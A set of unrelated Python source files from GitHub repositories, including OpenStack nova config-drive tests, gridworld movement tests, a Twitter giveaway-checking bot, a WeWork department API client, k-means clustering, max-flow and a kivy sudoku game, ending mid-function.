\"progress\": 0,\n \"fixed_ips\": [],\n \"task_state\": \"\",\n \"vm_state\": \"\",\n \"root_device_name\": inst.get('root_device_name', 'vda'),\n })\n\n return instance\n\n fake.stub_out_image_service(self)\n self.stub_out('nova.db.instance_create', instance_create)\n\n def _test_create_extra(self, params, override_controller):\n image_uuid = 'c905cedb-7281-47e4-8a62-f26bc5fc4c77'\n server = dict(name='server_test', imageRef=image_uuid, flavorRef=2)\n server.update(params)\n body = dict(server=server)\n req = fakes.HTTPRequest.blank(self.base_url + 'servers')\n req.method = 'POST'\n req.body = jsonutils.dump_as_bytes(body)\n req.headers[\"content-type\"] = \"application/json\"\n if override_controller is not None:\n server = override_controller.create(req, body=body).obj['server']\n else:\n server = self.controller.create(req, body=body).obj['server']\n\n def test_create_instance_with_config_drive_disabled(self):\n params = {'config_drive': \"False\"}\n old_create = 
compute_api.API.create\n\n def create(*args, **kwargs):\n self._verfiy_config_drive(**kwargs)\n return old_create(*args, **kwargs)\n\n self.stubs.Set(compute_api.API, 'create', create)\n self._test_create_extra(params,\n override_controller=self.no_config_drive_controller)\n\n def _create_instance_body_of_config_drive(self, param):\n self._initialize_extension()\n\n def create(*args, **kwargs):\n self.assertIn('config_drive', kwargs)\n return old_create(*args, **kwargs)\n\n old_create = compute_api.API.create\n self.stubs.Set(compute_api.API, 'create', create)\n image_href = '76fa36fc-c930-4bf3-8c8a-ea2a2420deb6'\n flavor_ref = ('http://localhost' + self.base_url + 'flavors/3')\n body = {\n 'server': {\n 'name': 'config_drive_test',\n 'imageRef': image_href,\n 'flavorRef': flavor_ref,\n 'config_drive': param,\n },\n }\n\n req = fakes.HTTPRequest.blank(self.base_url + 'servers')\n req.method = 'POST'\n req.body = jsonutils.dump_as_bytes(body)\n req.headers[\"content-type\"] = \"application/json\"\n\n return req, body\n\n def test_create_instance_with_config_drive(self):\n param = True\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_config_drive_as_boolean_string(self):\n param = 'false'\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_bad_config_drive(self):\n param = 12345\n req, body = self._create_instance_body_of_config_drive(param)\n self.assertRaises(self.bad_request,\n self.controller.create, req, body=body)\n\n def test_create_instance_without_config_drive(self):\n param = True\n req, body = self._create_instance_body_of_config_drive(param)\n del body['server']['config_drive']\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n\n def test_create_instance_with_empty_config_drive(self):\n param = ''\n req, body = self._create_instance_body_of_config_drive(param)\n self.assertRaises(exception.ValidationError,\n self.controller.create, req, body=body)\n\n\nclass ServersControllerCreateTestV2(ServersControllerCreateTestV21):\n bad_request = webob.exc.HTTPBadRequest\n\n def _set_up_controller(self):\n self.ext_mgr = extensions.ExtensionManager()\n self.ext_mgr.extensions = {}\n self.controller = servers_v2.Controller(self.ext_mgr)\n self.no_config_drive_controller = None\n\n def _verfiy_config_drive(self, **kwargs):\n self.assertIsNone(kwargs['config_drive'])\n\n def _initialize_extension(self):\n self.ext_mgr.extensions = {'os-config-drive': 'fake'}\n\n def test_create_instance_with_empty_config_drive(self):\n param = ''\n req, body = self._create_instance_body_of_config_drive(param)\n res = self.controller.create(req, body=body).obj\n server = res['server']\n self.assertEqual(fakes.FAKE_UUID, server['id'])\n","repo_name":"BU-NU-CLOUD-SP16/Trusted-Platform-Module-nova","sub_path":"nova/tests/unit/api/openstack/compute/test_config_drive.py","file_name":"test_config_drive.py","file_ext":"py","file_size_in_byte":9328,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"70900972626","text":"import pytest\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.envs.utils import get_next_position\nfrom 
gym_gridverse.geometry import Orientation, Position\n\n\n@pytest.mark.parametrize(\n    'position',\n    [\n        Position(-5, -5),\n        Position(-5, 0),\n        Position(-5, 5),\n        Position(0, -5),\n        Position(0, 0),\n        Position(0, 5),\n        Position(5, -5),\n        Position(5, 0),\n        Position(5, 5),\n    ],\n)\n@pytest.mark.parametrize('orientation', list(Orientation))\n@pytest.mark.parametrize(\n    'action',\n    [\n        Action.TURN_LEFT,\n        Action.TURN_RIGHT,\n        Action.ACTUATE,\n        Action.PICK_N_DROP,\n    ],\n)\ndef test_non_movement_actions(\n    position: Position, orientation: Orientation, action: Action\n):\n    \"\"\"Any action that does not 'move' should not affect next position\"\"\"\n    assert get_next_position(position, orientation, action) == position\n\n\n@pytest.mark.parametrize(\n    'position,orientation,action,expected',\n    [\n        (\n            Position(3, 6),\n            Orientation.F,\n            Action.MOVE_FORWARD,\n            Position(2, 6),\n        ),\n        (\n            Position(5, 2),\n            Orientation.B,\n            Action.MOVE_FORWARD,\n            Position(6, 2),\n        ),\n        (\n            Position(1, 2),\n            Orientation.L,\n            Action.MOVE_BACKWARD,\n            Position(1, 3),\n        ),\n        (Position(4, 1), Orientation.R, Action.MOVE_LEFT, Position(3, 1)),\n        # off grid\n        (\n            Position(0, 1),\n            Orientation.B,\n            Action.MOVE_BACKWARD,\n            Position(-1, 1),\n        ),\n        (\n            Position(4, 0),\n            Orientation.F,\n            Action.MOVE_LEFT,\n            Position(4, -1),\n        ),\n    ],\n)\ndef test_basic_moves(\n    position: Position,\n    orientation: Orientation,\n    action: Action,\n    expected: Position,\n):\n    assert get_next_position(position, orientation, action) == expected\n","repo_name":"abaisero/gym-gridverse","sub_path":"tests/envs/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"}
{"seq_id":"29526005996","text":"import serial\n# import os\nimport threading\nimport serial.tools.list_ports\nfrom time import sleep\n\n\ndef rcv_data():\n    while True:\n        rc = serial.readline()\n        rcv = rc.decode()\n        print(rcv)\n\n\nif __name__ == '__main__':\n    serialName = \"/dev/ttyS0\"\n    # print(serialName)\n    serial = serial.Serial(serialName, 115200, timeout=3600)\n    th = threading.Thread(target=rcv_data)\n    th.setDaemon(True)\n    th.start()\n    if serial.isOpen():\n        print(\"open succeed >\", serial.name)\n    else:\n        print(\"open failed >\", serial.name)\n    while True:\n        send_data = input(\"=>\")\n        send_data = send_data + '\\r\\n'\n        serial.write(send_data.encode())\n        data = serial.read(1)\n        sleep(0.1)\n        data = (data + serial.read(serial.inWaiting())).decode()\n        print(data)\n","repo_name":"chenyuyuan/nest-bs","sub_path":"hardware/archieve/main_old0.py","file_name":"main_old0.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"8515626643","text":"import requests\nfrom jsonpath import jsonpath\n\nfrom projects.test_requests.test_wework.api.wework import WeWork\nfrom projects.test_requests.test_wework.utils.common_tools import load_yaml\n\n\"\"\"\nBuild the API with raw requests!! 
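# The data-driven rewrite below loads endpoint definitions from YAML and
# dispatches through send_request. A minimal sketch of that dispatch idea,
# with a hypothetical endpoint table (the real load_yaml format may differ):
#     ENDPOINTS = {
#         "create_depart": ("POST", "https://qyapi.weixin.qq.com/cgi-bin/department/create"),
#         "delete_depart": ("GET", "https://qyapi.weixin.qq.com/cgi-bin/department/delete"),
#     }
#     def send_request(name, **kwargs):
#         method, url = ENDPOINTS[name]
#         return requests.request(method, url, **kwargs)  # HTTP verb passed by name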
\nclass Department(WeWork):\n\n    _secret = 'xxx'\n    _create_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/create'\n    _query_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/list'\n    _update_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/update'\n    _delete_url = 'https://qyapi.weixin.qq.com/cgi-bin/department/delete'\n\n    def __init__(self): \n        self._token = self.get_token(self._secret)\n\n    def create_depart(self, name, parent_id=1, **kwargs):\n        data = {'name': name, 'parentid': parent_id}\n        data.update(kwargs)\n        r = requests.post(self._create_url, json=data, params={'access_token': self._token})\n        return r.json()\n\n    def query_depart(self, **kwargs):\n        params = {'access_token': self._token}\n        params.update(kwargs)\n        r = requests.get(self._query_url, params=params)\n        return r.json()\n\n    def update_depart(self, ids, **kwargs):\n        data = {'id': ids}\n        data.update(kwargs)\n        r = requests.post(self._update_url, json=data, params={'access_token': self._token})\n        return r.json()\n\n    def delete_depart(self, ids):\n        params = {'access_token': self._token, 'id': ids}\n        r = requests.get(self._delete_url, params=params)\n        return r.json()\n\n    def clear_env(self, data):\n        for item in data:\n            res = self.query_depart()\n            val = jsonpath(res, f'$..department[?(@.name==\"{item}\")]')\n            if val:\n                ids = val[0]['id']\n                self.delete_depart(ids)\n\"\"\"\n\n\n# data-driven test steps\n\nclass Department(WeWork):\n    \"\"\"department management: crud\"\"\"\n\n    def __init__(self):\n        self._data = load_yaml('test_department.api')\n        self._token = self.get_token(self._data.get('secret'))\n\n    def create_depart(self, name, parent_id=1):\n        kwargs = dict(\n            params={'access_token': self._token},\n            json={'name': name, 'parentid': parent_id}\n        )\n        r = self.send_request(self._data, 'create_depart', **kwargs)\n        return r\n\n    def query_depart(self):\n        kwargs = dict(\n            params={'access_token': self._token}\n        )\n        r = self.send_request(self._data, 'query_depart', **kwargs)\n        return r\n\n    def update_depart(self, ids, **kwargs):\n        data = {'id': ids}\n        data.update(kwargs)\n        kwargs = dict(\n            params={'access_token': self._token},\n            json=data\n        )\n        r = self.send_request(self._data, 'update_depart', **kwargs)\n        return r\n\n    def delete_depart(self, ids):\n        kwargs = dict(\n            params={'access_token': self._token, 'id': ids}\n        )\n        r = self.send_request(self._data, 'delete_depart', **kwargs)\n        return r\n\n    def clear_env(self, data):\n        for item in data:\n            res = self.query_depart()\n            val = jsonpath(res, f'$..department[?(@.name==\"{item}\")]')\n            if val:\n                ids = val[0]['id']\n                self.delete_depart(ids)\n\n\n\n\n\n\n","repo_name":"emuyi/test-dev-skills","sub_path":"projects/test_requests/test_wework/api/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"385502310","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n# K-means clustering\n\n# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset \ndataset = pd.read_csv('Mall_Customers.csv')\nX = dataset.iloc[:,[3,4]].values\n\n# Using the elbow method to find the optimal # of clusters\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1,11):\n    clustering = KMeans(n_clusters=i, init = 'k-means++', max_iter = 300, n_init = 10, random_state=0)\n    clustering.fit(X)\n    wcss.append(clustering.inertia_)\n\nplt.figure()\nplt.plot(range(1,11),wcss)\nplt.title('The Elbow 
method')\nplt.xlabel('# of clusters')\nplt.ylabel('WCSS')\nplt.show()\n\n# Applying k-means to the dataset with optimal # of clusters\nclustering = KMeans(n_clusters=5, init = 'k-means++', max_iter = 300, n_init = 10, random_state=0)\nY_pred = clustering.fit_predict(X)\n\n# Visualizing the clusters\nplt.figure()\nplt.scatter(X[Y_pred == 0, 0], X[Y_pred == 0, 1], s = 10, c = 'red', label = 'Stingy')\nplt.scatter(X[Y_pred == 1, 0], X[Y_pred == 1, 1], s = 10, c = 'blue', label = 'Standard')\nplt.scatter(X[Y_pred == 2, 0], X[Y_pred == 2, 1], s = 10, c = 'green', label = 'Target')\nplt.scatter(X[Y_pred == 3, 0], X[Y_pred == 3, 1], s = 10, c = 'cyan', label = 'Careless')\nplt.scatter(X[Y_pred == 4, 0], X[Y_pred == 4, 1], s = 10, c = 'magenta', label = 'Sensible')\nplt.scatter(clustering.cluster_centers_[:,0], clustering.cluster_centers_[:,1], s = 30, c='black', label = 'Centroids')\nplt.title('Clusters of clients')\nplt.xlabel('Annual income (K$)')\nplt.ylabel('Spending score (1-100)')\nplt.legend()\nplt.show()","repo_name":"arun-nemani/Machine-learning-projects","sub_path":"Clustering/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27324319156","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 13 12:01:48 2023\n\n@author: Cristobal\n\"\"\"\nimport proxop as pr\nfrom prelim import P_cdom_star,P_cdom_persp,f_star,f_persp,prox_f_star,bounds\nfrom scipy.optimize import root_scalar\n#%%\ndef f_persp_prox(x,eta,Gamma,M,sigma,\n zero_tol = 10**(-16),\n alg = \"brentq\"):\n \n if Gamma < 0.0:\n raise ValueError(\n \"'gamma' in prox_{gamma * e^*} \"\n + \"must be greater or equal than 0\"\n )\n if Gamma < zero_tol:\n P = P_cdom_persp(x, eta)\n return f_persp(P[0],P[1])\n P = P_cdom_star(x/Gamma)\n l = eta + Gamma * f_star(P)\n phi = lambda nu : nu - eta - Gamma*f_star(prox_f_star(x/Gamma,\n nu/Gamma,\n zero_tol))\n \n #Sign check for the eta + Gamma *f_star(P_cdom_star(x/Gamma))\n if l < zero_tol:\n return 0.0\n else:\n #Projection onto closure is in the domain\n if x >= 0 :\n nu_u = l\n nu_d = 0\n if abs(phi(nu_u)) < zero_tol:\n nu_star = nu_u\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n if abs(phi(nu_d)) < zero_tol:\n nu_star = nu_u\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n #Projection onto closure is not in the domain \n else: \n bound = bounds(phi, M, sigma, zero_tol)\n if bound[2] == -1:\n nu_star = bound[0]\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star,\n gamma=Gamma/nu_star))\n else:\n nu_d = bound[0]\n nu_u = bound[1]\n #Root Finding algorithm check\n if alg == \"newton\":\n nu_star = root_scalar(phi,\n x0 = M,\n method = alg).root\n if alg == \"secant\":\n nu_star = root_scalar(phi,\n x0 = M,\n x1 = M/sigma,\n method = alg).root\n else:\n nu_star = root_scalar(phi,\n bracket = [nu_d,nu_u],\n method = alg).root\n return nu_star*pr.Exp()(pr.Exp().prox(x/nu_star, gamma=Gamma/nu_star))\n","repo_name":"Khris-VI/projection_epi","sub_path":"projection_epi/f_persp_prox.py","file_name":"f_persp_prox.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4883940887","text":"#Result: 100/100\n#Solved: 0:37:25\nfrom collections import defaultdict\nfor tc in range(int(input())):\n n = int(input())\n arr = [int(x) for x in input().split()]\n \n d = defaultdict(list)\n \n for i, x in 
enumerate(arr):\n        d[x].append(i+1)\n    ans = 0\n    \n    for k, v in d.items():\n        ans += abs(v[-1] - v[0])\n    print(ans) ","repo_name":"marcosD67/HackerEarth","sub_path":"DecemberCircuits/occurrences.py","file_name":"occurrences.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"16061098081","text":"import tweepy\nimport time\nimport logging\nimport utils\n\n#remove this and use your own keyz\nimport keys\n\n# KEYS\nclient_id = keys.client_id\nclient_secret = keys.client_secret\napi_key = keys.api_key\napi_key_secret = keys.api_key_secret\nbearer_token = keys.bearer_token\napi_token = keys.api_token\napi_token_secret = keys.api_token_secret\n\n#SETUP ENDPOINT\nauth = tweepy.OAuthHandler(api_key, api_key_secret, \"oop\")\napi = tweepy.API(auth)\nauth.set_access_token(api_token, api_token_secret) \nclient = tweepy.Client(bearer_token=bearer_token)\n\n# PARAMETERS\nsleep_time = 60\napi_cool_down = 60*15\n\n# check if name_2 follows name_1, requires screen_names\ndef isFollowedBy(sn_1, sn_2):\n    return api.get_friendship(source_screen_name=sn_1,target_screen_name=sn_2)[1].following\n\ndef checkIfFollows(screen_name, names):\n    for name in names:\n        if not isFollowedBy(name, screen_name):\n            return False\n    return True\n\ndef checkTags(screen_name, tags):\n    if len(tags) < utils.number_of_tags: #respect the requirement\n        return False\n\n    for tag in tags:\n        try:\n            #check if the tag exists\n            api.get_user(screen_name=tag)\n        except tweepy.errors.NotFound:\n            logging.error(\"Tagged user doesn't exist!\")\n            return False\n        #check if tag follows screen_name\n        if not isFollowedBy(screen_name, tag):\n            return False\n    \n    return True\n\ndef getRepliesToTweet(tweets, tweet_id):\n    replies = []\n    while True:\n        try:\n            tweet = tweets.next()\n            if tweet.in_reply_to_status_id == tweet_id:\n                replies.append(tweet)\n        except tweepy.errors.TooManyRequests as e:\n            logging.error(\"Twitter api rate limit reached:{}\".format(e))\n            utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n            time.sleep(60)\n        except tweepy.errors.TweepyException as e:\n            logging.error(\"Tweepy error occurred:{}\".format(e))\n            utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n            break\n        except StopIteration:\n            break\n        except Exception as e:\n            logging.error(\"Failed while fetching replies {}\".format(e))\n            utils.writePlain(\"bkp_\"+utils.candidates_file, replies)\n            break\n    return replies\n\ndef getValidReplies(replies, candidates):\n    result_dict = {}\n    for tweet in replies:\n        data = [ tweet.author.screen_name ]\n        if not checkIfFollows(data[0], utils.to_follow):\n            print(data[0]+\" doesn't follow the required user/users\")\n            continue\n        if not utils.checkIfLikes(data[0], utils.tweet_id):\n            print(data[0]+\" didn't like the required tweet/tweets\")\n            continue \n        if data[0] in candidates and data[0] not in result_dict.keys():\n            try:\n                tmp = tweet.text.split(\" \", 1) #remove @mention\n                tmp = tmp[1].split(\"#\", 1) #get discord name\n                discord_name = tmp[0]+\"#\" #save it\n                tmp = tmp[1].split(\" \") #get discord number\n                discord_name += tmp[0] #save it\n                data.append(discord_name)\n                data.append(tmp[1]) # wallet addr\n                if not checkTags(data[0], tmp[2:2+utils.number_of_tags]):\n                    continue\n            except IndexError:\n                logging.error(\"Tweet format not correct\")\n                logging.error(tweet.text)\n                continue\n            result_dict[data[0]] = data[1:3]\n    \n    return result_dict\n\ndef getReplies(candidates, _screen_name, tweet_id, key_word):\n    query = 'to:{} {}'.format(_screen_name, key_word)\n\n    tweets = 
tweepy.Cursor(api.search_tweets, until=utils.giveaway_end, since_id=tweet_id, count=200, q=query).items()\n \n replies = getRepliesToTweet(tweets, tweet_id)\n \n candidates = getValidReplies(replies, candidates)\n \n print( \"There are \" + str( len( candidates ) ) + \" candidates!\" )\n\n utils.writeDict(utils.candidates_file_name, candidates)\n\ndef iterTweetsInfo(func, id, l, next_page):\n while True:\n try:\n print(\"iterating...\")\n page = func(id=id,pagination_token=next_page)\n \n except tweepy.errors.TooManyRequests as e:\n logging.error(\"Twitter api rate limit reached: {}\".format(e))\n time.sleep(60*15)\n \n else: \n if 'next_token' not in page[3].keys():\n return l\n\n for user in page[0]:\n l.append(user.username)\n\n return iterTweetsInfo(func, id, l, page[3]['next_token'])\n\ndef getTweetsInfo(func, tweet_id, file_name):\n result = []\n\n while True:\n try:\n page = func(id=tweet_id)\n\n except tweepy.errors.TooManyRequests as e:\n logging.error(\"Twitter api rate limit reached:{}\".format(e))\n utils.writeFile(\"bkp_\"+file_name, result)\n time.sleep(60*15)\n \n else:\n result = [ u.username for u in page[0] ] \n\n return utils.writeFile(file_name, iterTweetsInfo(func, tweet_id, result, page[3]['next_token']))\n ","repo_name":"bonomip/tgb","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"197907231","text":"import random\nmark_list = [\"abc\"]\nif len(mark_list) == 1:\n ran_list = mark_list\nelse:\n ran_list = random.sample(mark_list, 2)\nfor i in ran_list: \n print(i)\n\n \nb = [12,1,3]\ndef a(ran_switch, ran_no, *args):\n if isinstance(args[0], list) == True:\n args = args[0]\n else:\n args = args\n # decide run_list\n if ran_switch == \"Y\":\n if len(args) == 1:\n run_list = random.sample(args, 1)\n else:\n run_list = random.sample(args, ran_no)\n else:\n run_list = args \n ran_no = 1\n for i in run_list:\n print(i)\ndf = a('Y', 2, b) \n\n\n\n\"\"\"\na = 'QW'\nprint(isinstance(a,int))\n\"\"\"","repo_name":"mingje/Qsync_test2","sub_path":"random_test.sikuli/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8183704705","text":"\nimport vtk\nfrom vtk.qt.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\n\nclass VTK_Test(object):\n\n def setupUI(self, vtkWidget):\n\n\n self.ren = vtk.vtkRenderer()\n vtkWidget.GetRenderWindow().AddRenderer(self.ren)\n self.iren = vtkWidget.GetRenderWindow().GetInteractor()\n\n # Create source\n source = vtk.vtkSphereSource()\n source.SetCenter(0, 0, 0)\n source.SetRadius(50.0)\n\n # Create a mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(source.GetOutputPort())\n\n # Create an actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n\n self.ren.AddActor(actor)\n\n self.ren.ResetCamera()\n\n self.iren.Initialize()\n","repo_name":"nilsgehlin/team-dft","sub_path":"UI/VTK_integration_demo/vtk_test.py","file_name":"vtk_test.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"1387901214","text":"#6086\n# MAX Flow\n# Edmond Karp\n\nimport sys\n\ninput = sys.stdin.readline\n\n\ndef CtoI(target):\n if target.isupper():\n return ord(target) - ord('A')\n else:\n return ord(target) - ord('a') + 26\n\n\nfrom collections import 
deque\n\nINF = int(1e9)\nMAX = 53\n\nresult = 0\ncapacity = [[0] * MAX for _ in range(MAX)]\nflow = [[0] * MAX for _ in range(MAX)]\ngraph = [[] for _ in range(MAX)]\ndistance = [-1] * MAX\n\n\ndef maxFlow(start, end):\n    result = 0\n    # print(start,end)\n    while True:\n        for i in range(MAX): distance[i] = -1\n        q = deque()\n        q.append(start)\n        while q and distance[end] == -1:\n            now = q.popleft()\n            for will in graph[now]:\n                if capacity[now][will] - flow[now][will] > 0 and distance[will] == -1:\n                    q.append(will)\n                    distance[will] = now\n                    # print(will , distance[will])\n                    if will == end: break\n        # print(distance)\n\n        if distance[end] == -1: break\n        minflow = INF\n\n        i = end\n        while i != start:\n            minflow = min(minflow, capacity[distance[i]][i] - flow[distance[i]][i])\n            i = distance[i]\n\n        i = end\n        while i != start:\n            flow[distance[i]][i] += minflow\n            flow[i][distance[i]] -= minflow\n            i = distance[i]\n        result += minflow\n\n    return result\n\n\nn = int(input())\nfor i in range(n):\n    a, b, c = list(input().split())\n    a = CtoI(a)\n    b = CtoI(b)\n    graph[a].append(b)\n    graph[b].append(a)\n    capacity[a][b] += int(c)\n    capacity[b][a] += int(c)\n\nprint(maxFlow(CtoI('A'), CtoI('Z')))\n\n","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/6086/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"69922703505","text":"from kivy.app import App\nfrom kivy.config import Config\nfrom kivy.core.window import Window\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.button import Button\nfrom kivy.uix.label import Label\nfrom kivy.uix.popup import Popup\nfrom kivy.clock import Clock\nfrom kivy.uix.screenmanager import Screen, ScreenManager, WipeTransition\n\nfrom datetime import datetime\nimport sqlite3\nimport os\n\nConfig.set('graphics', 'resizable', False)\nsm = ScreenManager()\n\ncell_color_default = (0, 0, 0, 1)\n\ncell_background_default = (1, 1, 1, 1)\ncell_background_accent = (0.93, 0.93, 0.93, 1)\ncell_background_selected = (1, 0.8, 0.8, 1)\ncell_background_generated = (0.83, 0.83, 0.83, 1)\n\ndb_uri = 'scores.db'\n\n\n# display the seconds in mm:ss format\ndef seconds2str(seconds: int) -> str:\n    return str(seconds // 60).zfill(2) + ':' + str(seconds % 60).zfill(2)\n\n\ndef open_db():\n    if os.path.isfile(db_uri):\n        try:\n            conn = sqlite3.connect(db_uri)\n        except sqlite3.Error:\n            print('Database error!')\n            return False\n        cur = conn.cursor()\n\n        cmd = 'CREATE TABLE IF NOT EXISTS scores(date DATETIME PRIMARY KEY, name VARCHAR(20), seconds INTEGER)'\n        cur.execute(cmd)\n\n        return [conn, cur]\n    return False\n\n\nclass MenuScreen(Screen):\n    def __init__(self, **kwargs):\n        super(MenuScreen, self).__init__(**kwargs)\n\n    @staticmethod\n    def new_game():\n        sm.current = 'Game'\n\n    @staticmethod\n    def rules():\n        sm.current = 'Rules'\n\n    @staticmethod\n    def scoreboard():\n        sm.current = 'Scoreboard'\n\n    @staticmethod\n    def exit_game():\n        App.get_running_app().stop()\n\n\nclass GameScreen(Screen):\n    def __init__(self, **kwargs):\n        super(GameScreen, self).__init__(**kwargs)\n        self._keyboard = None\n        self.game_started = False\n        self.seconds = 0\n        self.board = []\n        self.cells = []\n        self.selection = None\n        self.clockEvent = None\n\n    def build(self):\n        self.new_game()\n\n    def _on_enter(self):\n        self.new_game()\n        self._keyboard = Window.request_keyboard(self._keyboard_closed, self)\n        self._keyboard.bind(on_key_down=self._keyboard_press)\n\n    def _on_leave(self):\n        
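        # Keyboard lifecycle note: request_keyboard expects the close-callback
        # object itself (self._keyboard_closed, not its return value), and the
        # matching unbind must receive the same handler that was bound:
        #     kbd = Window.request_keyboard(self._keyboard_closed, self)
        #     kbd.bind(on_key_down=self._keyboard_press)
        #     ...
        #     kbd.unbind(on_key_down=self._keyboard_press)  # same handler object
        # (a sketch of the standard kivy pairing, using the method names above)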
self._keyboard_closed()\n\n def _clock_callback(self, dt):\n self.seconds += 1\n self.timer.text = seconds2str(self.seconds)\n\n def _keyboard_closed(self):\n if self._keyboard:\n self._keyboard.unbind(on_key_down=self._keyboard_press)\n self._keyboard = None\n\n def _keyboard_press(self, keyboard, keycode, text, modifiers):\n if self.selection:\n if keycode[1] == '1' or keycode[1] == 'numpad1':\n self.board[self.selection[0]][self.selection[1]] = 1\n elif keycode[1] == '2' or keycode[1] == 'numpad2':\n self.board[self.selection[0]][self.selection[1]] = 2\n elif keycode[1] == '3' or keycode[1] == 'numpad3':\n self.board[self.selection[0]][self.selection[1]] = 3\n elif keycode[1] == '4' or keycode[1] == 'numpad4':\n self.board[self.selection[0]][self.selection[1]] = 4\n elif keycode[1] == '5' or keycode[1] == 'numpad5':\n self.board[self.selection[0]][self.selection[1]] = 5\n elif keycode[1] == '6' or keycode[1] == 'numpad6':\n self.board[self.selection[0]][self.selection[1]] = 6\n elif keycode[1] == '7' or keycode[1] == 'numpad7':\n self.board[self.selection[0]][self.selection[1]] = 7\n elif keycode[1] == '8' or keycode[1] == 'numpad8':\n self.board[self.selection[0]][self.selection[1]] = 8\n elif keycode[1] == '9' or keycode[1] == 'numpad9':\n self.board[self.selection[0]][self.selection[1]] = 9\n elif keycode[1] == 'delete' or keycode[1] == 'backspace':\n self.board[self.selection[0]][self.selection[1]] = 0\n elif keycode[1] == 'left':\n row = self.selection[0]\n if self.selection[1] > 0:\n for col in range(self.selection[1] - 1, -1, -1):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'right':\n row = self.selection[0]\n if self.selection[1] < 9:\n for col in range(self.selection[1] + 1, 9):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'up':\n col = self.selection[1]\n if self.selection[0] > 0:\n for row in range(self.selection[0] - 1, -1, -1):\n if self.cells[row][col].select():\n break\n elif keycode[1] == 'down':\n col = self.selection[1]\n if self.selection[0] < 9:\n for row in range(self.selection[0] + 1, 9):\n if self.cells[row][col].select():\n break\n self.update_grid()\n if self.check_board():\n self.win()\n\n def start_timer(self):\n if self.clockEvent:\n self.clockEvent.cancel()\n self.clockEvent = Clock.schedule_interval(self._clock_callback, 1)\n\n def init_board(self):\n self.board.clear()\n for i in range(9):\n self.board.append([0, 0, 0, 0, 0, 0, 0, 0, 0])\n self.generate_puzzle()\n\n def new_game(self):\n self.init_board()\n self.create_cells()\n self.seconds = 0\n self.timer.text = seconds2str(self.seconds)\n self.start_timer()\n self.game_started = True\n\n def generate_puzzle(self):\n base = 3\n side = base * base\n\n # pattern for a baseline valid solution\n def pattern(r, c):\n return (base * (r % base) + r // base + c) % side\n\n # randomize rows, columns and numbers (of valid base pattern)\n from random import sample\n\n def shuffle(s):\n return sample(s, len(s))\n\n r_base = range(base)\n rows = [g * base + r for g in shuffle(r_base) for r in shuffle(r_base)]\n cols = [g * base + c for g in shuffle(r_base) for c in shuffle(r_base)]\n nums = shuffle(range(1, base * base + 1))\n\n # produce board using randomized baseline pattern\n self.board = [[nums[pattern(r, c)] for c in cols] for r in rows]\n\n squares = side * side\n empties = squares * 3 // 4\n for p in sample(range(squares), empties):\n # noinspection PyTypeChecker\n self.board[p // side][p % side] = 0\n\n def solve(self):\n def find_next_empty(i, j):\n for row in 
